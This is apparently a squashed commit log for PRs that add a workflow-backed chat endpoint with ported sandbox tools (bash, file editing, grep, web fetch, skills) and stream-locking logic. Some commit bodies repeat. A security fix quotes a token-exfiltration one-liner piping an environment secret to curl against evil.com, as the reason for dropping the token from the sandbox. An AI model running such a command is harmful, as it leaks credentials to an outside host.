Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). 
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. 
Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. 
New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). 
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model.
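The discoverSkills bullet mentions deduplication by name and dropping names that shadow built-in commands. Below is a minimal sketch of that filtering step, under a few assumptions. `SkillMeta` and `dedupeSkills` are hypothetical names. "First one scanned wins" and case-insensitive comparison are guesses, not confirmed behaviour. Reserved names are compared without the leading slash.

```typescript
// Minimal metadata shape for this sketch; the real SkillMetadata carries more fields.
interface SkillMeta {
  name: string;
  description: string;
  path: string;
}

// Built-in slash commands (without the "/"); a skill with one of these names is dropped.
const RESERVED_NAMES = new Set(["model", "resume", "new"]);

// Keep the first skill seen per name (assumption: scan order defines precedence)
// and compare names case-insensitively (assumption, matching skillTool's lookup).
function dedupeSkills(found: SkillMeta[]): SkillMeta[] {
  const seen = new Set<string>();
  const result: SkillMeta[] = [];
  for (const skill of found) {
    const key = skill.name.toLowerCase();
    if (RESERVED_NAMES.has(key) || seen.has(key)) continue;
    seen.add(key);
    result.push(skill);
  }
  return result;
}
```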
Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):
- ${workingDirectory}/.claude/skills/ (project, claude-style)
- ${workingDirectory}/.agents/skills/ (project, agents-style)
- ${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast.

Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit:
- Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
- Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header

Full suite 3055/3055; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite:
- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
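The two extracted helpers are small enough to sketch in full. The version below assumes an injected async `exists` predicate in place of whatever sandbox file call the real code uses; that parameter is hypothetical. It shows the SKILL.md-first lookup and the trailing-slash tolerance described by the unit tests.

```typescript
// Hypothetical signature: the real helper presumably checks files through the sandbox.
type Exists = (path: string) => Promise<boolean>;

// Prefer SKILL.md, fall back to skill.md, return null when neither exists.
async function findSkillFile(skillDir: string, exists: Exists): Promise<string | null> {
  for (const name of ["SKILL.md", "skill.md"]) {
    const candidate = `${skillDir}/${name}`;
    if (await exists(candidate)) return candidate;
  }
  return null;
}

// Global skills live at ${HOME}/.agents/skills; trailing slashes on HOME are tolerated.
function getGlobalSkillsDirectory(homeDirectory: string): string {
  return `${homeDirectory.replace(/\/+$/, "")}/.agents/skills`;
}
```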

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator.
Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR.
What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today.
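Two of the chat/recoupable helpers are pure string functions and can be sketched directly. In this version the regex, the acceptance of either a bare repo name or a clone URL, and the name `toChatTitle` are assumptions. `TITLE_MAX_LENGTH = 80` is inferred from "title-from-first-80". The truncation follows the later fix, which uses a one-character "…" suffix so the result is exactly the maximum length.

```typescript
const UUID = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}";
// "org-<slug>-<uuid>", optionally followed by ".git" when taken from a clone URL.
const ORG_REPO = new RegExp(`^org-.+-(${UUID})(?:\\.git)?$`, "i");

function extractOrgId(repoNameOrUrl: string | null | undefined): string | null {
  if (!repoNameOrUrl) return null;
  // Use the last path segment so bare repo names and clone URLs both work (assumption).
  const lastSegment = repoNameOrUrl.replace(/\/+$/, "").split("/").pop() ?? "";
  const match = ORG_REPO.exec(lastSegment);
  return match ? match[1].toLowerCase() : null;
}

const TITLE_MAX_LENGTH = 80; // assumption, from "title-from-first-80"
const ELLIPSIS = "…"; // a single UTF-16 code unit, unlike "..." (three)

// Hypothetical helper: truncate to exactly `max` characters, reserving room for the suffix.
function toChatTitle(text: string, max = TITLE_MAX_LENGTH): string {
  if (text.length <= max) return text;
  return text.slice(0, max - ELLIPSIS.length) + ELLIPSIS;
}
```

The greedy `.+` in the slug group backtracks until a full UUID remains at the end. Slugs that contain hyphens, such as `rostrum-pacific`, therefore still parse.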
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until message threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency.

Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured:
- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib.
- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result.
  Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline.
- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...).update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are unchanged.

37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds.
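The CAS-before-start fix and the `"error" in result` narrowing fit in one small in-memory model. Everything in this sketch is a simplified, hypothetical stand-in: a `Map` replaces the chats table, the wrapper's signature is invented for illustration, and `startWorkflow` takes the place of `start(workflow)`. Because the claim happens synchronously before the first `await`, a second concurrent request sees the `pending-<uuid>` placeholder and gets a 409 without ever starting a billable run.

```typescript
import { randomUUID } from "node:crypto";

// In-memory stand-in for the chats table (hypothetical; the real code goes through Supabase).
type ChatRow = { id: string; active_stream_id: string | null };
type Chats = Map<string, ChatRow>;

// Discriminated result: "race lost" (claimed: false) is distinct from an error.
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

// Set active_stream_id to `next` only if it currently equals `expected`.
function compareAndSetChatActiveStreamId(
  chats: Chats,
  chatId: string,
  expected: string | null,
  next: string | null,
): CasResult {
  const row = chats.get(chatId);
  if (!row) return { ok: false, error: "chat not found" };
  if (row.active_stream_id !== expected) return { ok: true, claimed: false };
  row.active_stream_id = next;
  return { ok: true, claimed: true };
}

// Claim with a placeholder BEFORE starting the workflow, then promote it to the real run id.
async function claimThenStart(
  chats: Chats,
  chatId: string,
  startWorkflow: () => Promise<string>, // hypothetical: resolves to the real run id
): Promise<{ status: 200; runId: string } | { status: 409 | 500 }> {
  const placeholder = `pending-${randomUUID()}`;
  const claim = compareAndSetChatActiveStreamId(chats, chatId, null, placeholder);
  if ("error" in claim) return { status: 500 }; // in-operator narrowing
  if (!claim.claimed) return { status: 409 }; // another request already owns this chat
  const runId = await startWorkflow();
  compareAndSetChatActiveStreamId(chats, chatId, placeholder, runId); // promote placeholder
  return { status: 200, runId };
}
```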
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

